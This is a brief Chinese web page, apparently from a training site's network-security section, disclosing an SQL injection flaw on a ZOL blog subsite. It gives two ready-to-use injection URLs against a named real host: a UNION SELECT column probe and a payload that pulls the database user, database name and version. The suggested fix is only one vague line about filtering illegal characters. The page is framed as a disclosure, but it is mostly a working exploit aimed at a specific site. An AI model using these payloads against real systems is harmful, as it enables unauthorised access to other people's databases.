软件开发培训班 >> 网络技术 >> 网络安全
中关村在线博客子站SQL注入及修复方案 |
|
本文标签:SQL注入 http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5-- ![]() http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,CONCAT(user(),0x7c,database(),0x7c,version()),4,5-- ![]() ![]() ![]() 修复方案: 过滤参数提交非法字符或者拦截敏感字符等等 。 。 。 |